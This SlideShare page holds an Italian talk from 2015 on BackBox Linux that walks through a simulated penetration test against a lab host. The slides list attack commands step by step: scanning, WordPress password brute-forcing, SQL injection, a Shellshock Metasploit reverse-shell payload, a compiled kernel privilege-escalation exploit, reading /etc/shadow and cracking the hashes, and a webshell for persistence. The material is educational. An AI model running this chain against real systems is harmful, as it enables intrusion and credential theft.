SlideShare a Scribd company logo
1 of 20
Download to read offline
BackBox Linux
Penetration Test and Security Assessment
Forlì Linux Users Group - 11 Dicembre 2015
Simulazione di un Penetration Test
Andrea Draghetti
About Me
BackBox Team Member
Over Security Founder
Independent Security Researcher
….
About BackBox
BackBox è una distribuzione Free Open Source nata nel 2010 in
Italia ed è concepita per gli appassionati di Sicurezza Informatica!
Permette di effettuare Penetration Testing e Security Assessment.
È basata su Ubuntu, offre oltre 100 Tools dedicati al mondo dell’IT
Security, Mobile Analysis, ecc. 



Ha un piano di rilascio previsto ogni 4 mesi e compatibile con
ecosistemi a 32 o 64Bit.
Look At The World
НИН 28.11.2015
DistroWatch attesta
a BackBox la seconda
posizione della sua
categoria. È la 56° distro
Linux più scaricata
al mondo.
Il 37% dei Download
proviene dal continente
Asiatico, BackBox 4.4
ha ottenuto oltre
50mila download in
30 giorni!
Screenshot
Follow BackBox
backbox.org
launchpad.net/~backbox
facebook.com/backbox.linux
twitter.com/backboxlinux
Simulazione di un Penetration Test
I. Information Gathering;
II. Vulnerability Assessment;
III. Exploitation;
IV. Privilege Escalation;
V. Maintaining Access;
VI. Reporting.
Documento completo sulla simulazione di un Penetration Test
http://www.isticom.it/documenti/rivista/rivista2013/2013_12_129-134_simulazione_penetration_test.pdf
Standard, in fase di definizione, degli elementi fondamentali di un PenTest
http://www.pentest-standard.org
Information Gathering
L’Information Gathering ha l’obbiettivo di raccogliere informazioni utili
sul bersaglio come una lista di nomi di dominio, l’architettura della
piattaforma, delimitazione di indirizzi IP, sistemi e porte attive, servizi
offerti ed infine un elenco di nominativi ed eMail utili in caso di attacco
Social Engineering. I dati raccolti in questa fase ci permetteranno di
scegliere la linea di attacco da seguire nel passo successivo.
Per questa fase sfrutteremo
• nmap
• dirs3arch
Vulnerability Assessment
L’attività di Vulnerability Assessment permette di identificare ogni
vulnerabilità creando un quadro completo dello stato di esposizione
della rete in analisi a tutte le vulnerabilità note, ma non è in grado di
valutarne con precisione l’effettiva sfruttabilità. Per questa attività
vengono abitualmente utilizzati tools automatici che grazie alla loro
velocità di scansione permettono di analizzare in breve tempo un
ampio numero di servizi.
Per questa fase sfrutteremo
• wpscan
• sqlmap
Exploitation
La fase di Exploitation permette di ricercare all’interno di un software
una vulnerabilità in grado di provocare un imprevisto nel sistema
bersaglio del nostro attacco. Questa tecnica spesso permette di
ottenere il controllo di un sistema informatico, l’acquisizione di privilegi
oppure un Denial of Service. Ci sono diversi metodi di classificazione
degli exploit, più in generale avremo un exploit remoto se compiuto
attraverso la rete o un exploit locale se si opera direttamente sul
sistema.
Per questa fase sfrutteremo
• Metasploit e CVE-2014-6271
Privilege Escalation
In questa Privilege Escalation sfrutteremo l’accesso ricavato
precedentemente attraverso ShellShock per innalzare i nostri privilegi;
questo avviene sfruttando una ulteriore vulnerabilità del sistema.
Successivamente tramite un tool di password cracking (john the
ripper) e/o brute force, cercheremo di ottenere le password di utenti
con privilegi elevati (come root).
Per questa fase sfrutteremo
• GCC e CVE-2012-0056
• John the Ripper
Maintaining Access
Violato il sistema è indubbiamente preferibile crearsi un accesso
comodo e duraturo in grado di poter operare in un secondo momento
anche da remoto senza ripetere l’intera procedura di hack. Nella fase
di Maintaining Access si installano abitualmente Backdoor o WebShell
che ci permettono di avere il controllo immediato del sistema.
Per questa fase sfrutteremo
• weevely
Lab
BackBox Linux
Target: hackme.site
Lab
BackBox Linux
Target: hackme.site
• Porte
• 22 SSH
• 80 Apache
• Web
• /phpmyadmin
• /wp
• /panel
• /info
• /cgi-bin
• dirs3arch -u http://hackme.site -e php
• nmap -A -v hackme.site
Lab
BackBox Linux
Target: hackme.site
• Porte
• 22 SSH
• 80 Apache
• Web
• /phpmyadmin
• /wp
• /panel
• /info
• /cgi-bin
• Wordpress
• XSS Vulnerability
• No Brute force protection
• wpscan -u http://hackme.site/wp
--wordlist psw.txt --username admin
• wpscan -u http://hackme.site/wp -e u
• wpscan -u http://hackme.site/wp -e p
• dirs3arch -u http://hackme.site -e php
• nmap -A -v hackme.site
Lab
BackBox Linux
Target: hackme.site
• Porte
• 22 SSH
• 80 Apache
• Web
• /phpmyadmin
• /wp
• /panel
• /info
• /cgi-bin
• Wordpress
• XSS Vulnerability
• No Brute force protection
• Panel
• SQL Injection
• sqlmap -u http://hackme.site/panel --form
• wpscan -u http://hackme.site/wp
--wordlist psw.txt --username admin
• wpscan -u http://hackme.site/wp -e u
• wpscan -u http://hackme.site/wp -e p
• dirs3arch -u http://hackme.site -e php
• nmap -A -v hackme.site
Lab
BackBox Linux
Target: hackme.site
• Porte
• 22 SSH
• 80 Apache
• Web
• /phpmyadmin
• /wp
• /panel
• /info
• /cgi-bin
• Wordpress
• XSS Vulnerability
• No Brute force protection
• Panel
• SQL Injection
• CGI
• Shellshock Vulnerability
• shell and more…
• exploit
• set options …
• set PAYLOAD linux/x86/meterpreter/
reverse_tcp
• use exploit/multi/http/
apache_mod_cgi_bash_env_exec
• msfconsole
• sqlmap -u http://hackme.site/panel --form
• wpscan -u http://hackme.site/wp
--wordlist psw.txt --username admin
• wpscan -u http://hackme.site/wp -e u
• wpscan -u http://hackme.site/wp -e p
• dirs3arch -u http://hackme.site -e php
• nmap -A -v hackme.site
Lab
BackBox Linux
Target: hackme.site
• Porte
• 22 SSH
• 80 Apache
• Web
• /phpmyadmin
• /wp
• /panel
• /info
• /cgi-bin
• Wordpress
• XSS Vulnerability
• No Brute force protection
• Panel
• SQL Injection
• CGI
• Shellshock Vulnerability
• Shell
• Kernel Privilege Escalation
• john password --show
• unshadow passwd shadow > passwod
• cat etc/shadow && cat etc/passwd
• ./exploit
• gcc 18411.c -o exploit
• shell and more…
• exploit
• set options …
• set PAYLOAD linux/x86/meterpreter/
reverse_tcp
• use exploit/multi/http/
apache_mod_cgi_bash_env_exec
• msfconsole
• sqlmap -u http://hackme.site/panel --form
• wpscan -u http://hackme.site/wp
--wordlist psw.txt --username admin
• wpscan -u http://hackme.site/wp -e u
• wpscan -u http://hackme.site/wp -e p
• dirs3arch -u http://hackme.site -e php
• nmap -A -v hackme.site
Lab
BackBox Linux
Target: hackme.site
Happy Hacking!
Questions?
andrea@backbox.org

More Related Content

What's hot

Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFiLinux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFiAndrea Draghetti
 
Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Andrea Draghetti
 
Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...Marco Ferrigno
 
Agrillo Fedora 11 release party 18 giugno 2009
Agrillo Fedora 11 release party 18 giugno 2009Agrillo Fedora 11 release party 18 giugno 2009
Agrillo Fedora 11 release party 18 giugno 2009Giuseppe Agrillo
 
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioni
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioniBackdoor Coding: Analisi di una semplice backdoor e prime applicazioni
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioniSalvatore Lentini
 
Il venerdì nero di wannacry
Il venerdì nero di wannacryIl venerdì nero di wannacry
Il venerdì nero di wannacryGianni Amato
 
Rootkit: teoria e pratica. Michele BOLOGNA
Rootkit: teoria e pratica. Michele BOLOGNARootkit: teoria e pratica. Michele BOLOGNA
Rootkit: teoria e pratica. Michele BOLOGNAMichele Bologna
 
Penetration Testing con Python - Network Sniffer
Penetration Testing con Python - Network SnifferPenetration Testing con Python - Network Sniffer
Penetration Testing con Python - Network SnifferSimone Onofri
 
Fuzzing Techniques for Software Vulnerability Discovery
Fuzzing Techniques for Software Vulnerability DiscoveryFuzzing Techniques for Software Vulnerability Discovery
Fuzzing Techniques for Software Vulnerability Discoveryameft
 
Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)Gianfranco Tonello
 

What's hot (12)

Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFiLinux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
 
Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016
 
Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...
 
Linux Day 2009 LAMP HowTo
Linux Day 2009 LAMP HowToLinux Day 2009 LAMP HowTo
Linux Day 2009 LAMP HowTo
 
Agrillo Fedora 11 release party 18 giugno 2009
Agrillo Fedora 11 release party 18 giugno 2009Agrillo Fedora 11 release party 18 giugno 2009
Agrillo Fedora 11 release party 18 giugno 2009
 
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioni
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioniBackdoor Coding: Analisi di una semplice backdoor e prime applicazioni
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioni
 
Exploitation windows7
Exploitation windows7Exploitation windows7
Exploitation windows7
 
Il venerdì nero di wannacry
Il venerdì nero di wannacryIl venerdì nero di wannacry
Il venerdì nero di wannacry
 
Rootkit: teoria e pratica. Michele BOLOGNA
Rootkit: teoria e pratica. Michele BOLOGNARootkit: teoria e pratica. Michele BOLOGNA
Rootkit: teoria e pratica. Michele BOLOGNA
 
Penetration Testing con Python - Network Sniffer
Penetration Testing con Python - Network SnifferPenetration Testing con Python - Network Sniffer
Penetration Testing con Python - Network Sniffer
 
Fuzzing Techniques for Software Vulnerability Discovery
Fuzzing Techniques for Software Vulnerability DiscoveryFuzzing Techniques for Software Vulnerability Discovery
Fuzzing Techniques for Software Vulnerability Discovery
 
Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)
 

Viewers also liked

Logo Design Process by Nirvan
Logo Design Process by NirvanLogo Design Process by Nirvan
Logo Design Process by Nirvanishwon
 
Back box user-guide
Back box user-guideBack box user-guide
Back box user-guidedsd124
 
Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisurePhishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisureAndrea Draghetti
 
festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...
festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...
festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...festival ICT 2016
 
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...festival ICT 2016
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsYury Chemerkin
 
Offensive security con strumenti open source
Offensive security con strumenti open sourceOffensive security con strumenti open source
Offensive security con strumenti open sourcePordenone LUG
 
OpenVAS, lo strumento open source per il vulnerability assessment
OpenVAS, lo strumento open source per il vulnerability assessmentOpenVAS, lo strumento open source per il vulnerability assessment
OpenVAS, lo strumento open source per il vulnerability assessmentBabel
 
Web Application Security 101 - 04 Testing Methodology
Web Application Security 101 - 04 Testing MethodologyWeb Application Security 101 - 04 Testing Methodology
Web Application Security 101 - 04 Testing MethodologyWebsecurify
 
Web Application Security 101 - 03 Web Security Toolkit
Web Application Security 101 - 03 Web Security ToolkitWeb Application Security 101 - 03 Web Security Toolkit
Web Application Security 101 - 03 Web Security ToolkitWebsecurify
 
we45 - Web Application Security Testing Case Study
we45 - Web Application Security Testing Case Studywe45 - Web Application Security Testing Case Study
we45 - Web Application Security Testing Case Studywe45
 

Viewers also liked (13)

Logo Design Process by Nirvan
Logo Design Process by NirvanLogo Design Process by Nirvan
Logo Design Process by Nirvan
 
Back box user-guide
Back box user-guideBack box user-guide
Back box user-guide
 
Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisurePhishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e Contromisure
 
festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...
festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...
festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...
 
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingTools
 
Offensive security con strumenti open source
Offensive security con strumenti open sourceOffensive security con strumenti open source
Offensive security con strumenti open source
 
Nikto
NiktoNikto
Nikto
 
Nikto
NiktoNikto
Nikto
 
OpenVAS, lo strumento open source per il vulnerability assessment
OpenVAS, lo strumento open source per il vulnerability assessmentOpenVAS, lo strumento open source per il vulnerability assessment
OpenVAS, lo strumento open source per il vulnerability assessment
 
Web Application Security 101 - 04 Testing Methodology
Web Application Security 101 - 04 Testing MethodologyWeb Application Security 101 - 04 Testing Methodology
Web Application Security 101 - 04 Testing Methodology
 
Web Application Security 101 - 03 Web Security Toolkit
Web Application Security 101 - 03 Web Security ToolkitWeb Application Security 101 - 03 Web Security Toolkit
Web Application Security 101 - 03 Web Security Toolkit
 
we45 - Web Application Security Testing Case Study
we45 - Web Application Security Testing Case Studywe45 - Web Application Security Testing Case Study
we45 - Web Application Security Testing Case Study
 

Similar to BackBox Linux: Simulazione di un Penetration Test

CMS - Analisi Vulnerabilità
CMS - Analisi VulnerabilitàCMS - Analisi Vulnerabilità
CMS - Analisi Vulnerabilitàraffaele_forte
 
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open sourceLinux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open sourceMario Rossano
 
Programma il futuro: una scelta open source
Programma il futuro: una scelta open sourceProgramma il futuro: una scelta open source
Programma il futuro: una scelta open sourceMarco Ferrigno
 
Tutto Quello Che Devi Sapere Su Cryptolocker.pdf
Tutto Quello Che Devi Sapere Su Cryptolocker.pdfTutto Quello Che Devi Sapere Su Cryptolocker.pdf
Tutto Quello Che Devi Sapere Su Cryptolocker.pdfHelpRansomware
 
Ransomware Attack nel 2019 Dal file system ai database e non solo...
Ransomware Attack nel 2019 Dal file system ai database e non solo...Ransomware Attack nel 2019 Dal file system ai database e non solo...
Ransomware Attack nel 2019 Dal file system ai database e non solo...Massimo Chirivì
 
Programma il futuro : una scelta Open Source
Programma il futuro : una scelta Open SourceProgramma il futuro : una scelta Open Source
Programma il futuro : una scelta Open SourceNaLUG
 
Linux Security Hardening - panoramica sui principi generali per la riduzione...
Linux  Security Hardening - panoramica sui principi generali per la riduzione...Linux  Security Hardening - panoramica sui principi generali per la riduzione...
Linux Security Hardening - panoramica sui principi generali per la riduzione...Marco Ferrigno
 
Hardening
HardeningHardening
HardeningNaLUG
 
Introduzione all'Information Gathering
Introduzione all'Information GatheringIntroduzione all'Information Gathering
Introduzione all'Information GatheringSalvatore Lentini
 
Fisherman's tale easy security threat 4.0
Fisherman's tale   easy security threat 4.0Fisherman's tale   easy security threat 4.0
Fisherman's tale easy security threat 4.0Massimiliano Brolli
 
Maven: Convention over Configuration
Maven: Convention over ConfigurationMaven: Convention over Configuration
Maven: Convention over Configurationvschiavoni
 
Web Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code ReviewWeb Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code ReviewAntonio Parata
 
(in)Sicurezza nella PA - Gianluca Varisco, Cybersecurity del Team per la Tras...
(in)Sicurezza nella PA - Gianluca Varisco, Cybersecurity del Team per la Tras...(in)Sicurezza nella PA - Gianluca Varisco, Cybersecurity del Team per la Tras...
(in)Sicurezza nella PA - Gianluca Varisco, Cybersecurity del Team per la Tras...Team per la Trasformazione Digitale
 
Web Content Filtering
Web Content FilteringWeb Content Filtering
Web Content Filteringmmarcuzzi
 
Matteo Flora: Cyber Warfare e CyberGuerrilla
Matteo Flora: Cyber Warfare e CyberGuerrillaMatteo Flora: Cyber Warfare e CyberGuerrilla
Matteo Flora: Cyber Warfare e CyberGuerrillaMatteo Flora
 
Meetmagento 2014 hackers_onofri
Meetmagento 2014 hackers_onofriMeetmagento 2014 hackers_onofri
Meetmagento 2014 hackers_onofriSimone Onofri
 
Hackers vs Developers - Nuove e vecchie vulnerabilità con la OWASP TOP 10 2013
Hackers vs Developers - Nuove e vecchie vulnerabilità con la OWASP TOP 10 2013Hackers vs Developers - Nuove e vecchie vulnerabilità con la OWASP TOP 10 2013
Hackers vs Developers - Nuove e vecchie vulnerabilità con la OWASP TOP 10 2013Simone Onofri
 

Similar to BackBox Linux: Simulazione di un Penetration Test (20)

Automotive Security
Automotive SecurityAutomotive Security
Automotive Security
 
CMS - Analisi Vulnerabilità
CMS - Analisi VulnerabilitàCMS - Analisi Vulnerabilità
CMS - Analisi Vulnerabilità
 
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open sourceLinux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
 
Programma il futuro: una scelta open source
Programma il futuro: una scelta open sourceProgramma il futuro: una scelta open source
Programma il futuro: una scelta open source
 
Tutto Quello Che Devi Sapere Su Cryptolocker.pdf
Tutto Quello Che Devi Sapere Su Cryptolocker.pdfTutto Quello Che Devi Sapere Su Cryptolocker.pdf
Tutto Quello Che Devi Sapere Su Cryptolocker.pdf
 
Come proteggersi dagli attacchi informatici
Come proteggersi dagli attacchi informaticiCome proteggersi dagli attacchi informatici
Come proteggersi dagli attacchi informatici
 
Ransomware Attack nel 2019 Dal file system ai database e non solo...
Ransomware Attack nel 2019 Dal file system ai database e non solo...Ransomware Attack nel 2019 Dal file system ai database e non solo...
Ransomware Attack nel 2019 Dal file system ai database e non solo...
 
Programma il futuro : una scelta Open Source
Programma il futuro : una scelta Open SourceProgramma il futuro : una scelta Open Source
Programma il futuro : una scelta Open Source
 
Linux Security Hardening - panoramica sui principi generali per la riduzione...
Linux  Security Hardening - panoramica sui principi generali per la riduzione...Linux  Security Hardening - panoramica sui principi generali per la riduzione...
Linux Security Hardening - panoramica sui principi generali per la riduzione...
 
Hardening
HardeningHardening
Hardening
 
Introduzione all'Information Gathering
Introduzione all'Information GatheringIntroduzione all'Information Gathering
Introduzione all'Information Gathering
 
Fisherman's tale easy security threat 4.0
Fisherman's tale   easy security threat 4.0Fisherman's tale   easy security threat 4.0
Fisherman's tale easy security threat 4.0
 
Maven: Convention over Configuration
Maven: Convention over ConfigurationMaven: Convention over Configuration
Maven: Convention over Configuration
 
Web Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code ReviewWeb Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code Review
 
(in)Sicurezza nella PA - Gianluca Varisco, Cybersecurity del Team per la Tras...
(in)Sicurezza nella PA - Gianluca Varisco, Cybersecurity del Team per la Tras...(in)Sicurezza nella PA - Gianluca Varisco, Cybersecurity del Team per la Tras...
(in)Sicurezza nella PA - Gianluca Varisco, Cybersecurity del Team per la Tras...
 
Web Content Filtering
Web Content FilteringWeb Content Filtering
Web Content Filtering
 
Matteo Flora: Cyber Warfare e CyberGuerrilla
Matteo Flora: Cyber Warfare e CyberGuerrillaMatteo Flora: Cyber Warfare e CyberGuerrilla
Matteo Flora: Cyber Warfare e CyberGuerrilla
 
Meetmagento 2014 hackers_onofri
Meetmagento 2014 hackers_onofriMeetmagento 2014 hackers_onofri
Meetmagento 2014 hackers_onofri
 
Antivirus & Antivirus Evasion
Antivirus & Antivirus EvasionAntivirus & Antivirus Evasion
Antivirus & Antivirus Evasion
 
Hackers vs Developers - Nuove e vecchie vulnerabilità con la OWASP TOP 10 2013
Hackers vs Developers - Nuove e vecchie vulnerabilità con la OWASP TOP 10 2013Hackers vs Developers - Nuove e vecchie vulnerabilità con la OWASP TOP 10 2013
Hackers vs Developers - Nuove e vecchie vulnerabilità con la OWASP TOP 10 2013
 

More from Andrea Draghetti

Frodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisureFrodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisureAndrea Draghetti
 
Phishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzionePhishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzioneAndrea Draghetti
 
Gophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishingGophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishingAndrea Draghetti
 
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!Andrea Draghetti
 
Let’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklistsLet’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklistsAndrea Draghetti
 
Cyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusioneCyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusioneAndrea Draghetti
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaAndrea Draghetti
 
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitariPi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitariAndrea Draghetti
 
Errori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativoErrori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativoAndrea Draghetti
 
Hacking Lab con ProxMox e Metasploitable
Hacking Lab con ProxMox e MetasploitableHacking Lab con ProxMox e Metasploitable
Hacking Lab con ProxMox e MetasploitableAndrea Draghetti
 
Phishing: One Shot Many Victims
Phishing: One Shot Many VictimsPhishing: One Shot Many Victims
Phishing: One Shot Many VictimsAndrea Draghetti
 
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...Andrea Draghetti
 
BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!Andrea Draghetti
 

More from Andrea Draghetti (13)

Frodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisureFrodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisure
 
Phishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzionePhishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzione
 
Gophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishingGophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishing
 
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
 
Let’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklistsLet’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklists
 
Cyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusioneCyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusione
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e Sicurezza
 
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitariPi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
 
Errori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativoErrori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativo
 
Hacking Lab con ProxMox e Metasploitable
Hacking Lab con ProxMox e MetasploitableHacking Lab con ProxMox e Metasploitable
Hacking Lab con ProxMox e Metasploitable
 
Phishing: One Shot Many Victims
Phishing: One Shot Many VictimsPhishing: One Shot Many Victims
Phishing: One Shot Many Victims
 
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
 
BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!
 

Recently uploaded

Federico Bottino, Lead Venture Builder – “Riflessioni sull’Innovazione: La Cu...
Federico Bottino, Lead Venture Builder – “Riflessioni sull’Innovazione: La Cu...Federico Bottino, Lead Venture Builder – “Riflessioni sull’Innovazione: La Cu...
Federico Bottino, Lead Venture Builder – “Riflessioni sull’Innovazione: La Cu...Associazione Digital Days
 
Daniele Lunassi, CEO & Head of Design @Eye Studios – “Creare prodotti e servi...
Daniele Lunassi, CEO & Head of Design @Eye Studios – “Creare prodotti e servi...Daniele Lunassi, CEO & Head of Design @Eye Studios – “Creare prodotti e servi...
Daniele Lunassi, CEO & Head of Design @Eye Studios – “Creare prodotti e servi...Associazione Digital Days
 
Luigi Di Carlo, CEO & Founder @Evometrika srl – “Ruolo della computer vision ...
Luigi Di Carlo, CEO & Founder @Evometrika srl – “Ruolo della computer vision ...Luigi Di Carlo, CEO & Founder @Evometrika srl – “Ruolo della computer vision ...
Luigi Di Carlo, CEO & Founder @Evometrika srl – “Ruolo della computer vision ...Associazione Digital Days
 
Alessio Mazzotti, Aaron Brancotti; Writer, Screenwriter, Director, UX, Autore...
Alessio Mazzotti, Aaron Brancotti; Writer, Screenwriter, Director, UX, Autore...Alessio Mazzotti, Aaron Brancotti; Writer, Screenwriter, Director, UX, Autore...
Alessio Mazzotti, Aaron Brancotti; Writer, Screenwriter, Director, UX, Autore...Associazione Digital Days
 
Edoardo Di Pietro – “Virtual Influencer vs Umano: Rubiamo il lavoro all’AI”
Edoardo Di Pietro – “Virtual Influencer vs Umano: Rubiamo il lavoro all’AI”Edoardo Di Pietro – “Virtual Influencer vs Umano: Rubiamo il lavoro all’AI”
Edoardo Di Pietro – “Virtual Influencer vs Umano: Rubiamo il lavoro all’AI”Associazione Digital Days
 
ScrapeGraphAI: a new way to scrape context with AI
ScrapeGraphAI: a new way to scrape context with AIScrapeGraphAI: a new way to scrape context with AI
ScrapeGraphAI: a new way to scrape context with AIinfogdgmi
 

Recently uploaded (6)

Federico Bottino, Lead Venture Builder – “Riflessioni sull’Innovazione: La Cu...
Federico Bottino, Lead Venture Builder – “Riflessioni sull’Innovazione: La Cu...Federico Bottino, Lead Venture Builder – “Riflessioni sull’Innovazione: La Cu...
Federico Bottino, Lead Venture Builder – “Riflessioni sull’Innovazione: La Cu...
 
Daniele Lunassi, CEO & Head of Design @Eye Studios – “Creare prodotti e servi...
Daniele Lunassi, CEO & Head of Design @Eye Studios – “Creare prodotti e servi...Daniele Lunassi, CEO & Head of Design @Eye Studios – “Creare prodotti e servi...
Daniele Lunassi, CEO & Head of Design @Eye Studios – “Creare prodotti e servi...
 
Luigi Di Carlo, CEO & Founder @Evometrika srl – “Ruolo della computer vision ...
Luigi Di Carlo, CEO & Founder @Evometrika srl – “Ruolo della computer vision ...Luigi Di Carlo, CEO & Founder @Evometrika srl – “Ruolo della computer vision ...
Luigi Di Carlo, CEO & Founder @Evometrika srl – “Ruolo della computer vision ...
 
Alessio Mazzotti, Aaron Brancotti; Writer, Screenwriter, Director, UX, Autore...
Alessio Mazzotti, Aaron Brancotti; Writer, Screenwriter, Director, UX, Autore...Alessio Mazzotti, Aaron Brancotti; Writer, Screenwriter, Director, UX, Autore...
Alessio Mazzotti, Aaron Brancotti; Writer, Screenwriter, Director, UX, Autore...
 
Edoardo Di Pietro – “Virtual Influencer vs Umano: Rubiamo il lavoro all’AI”
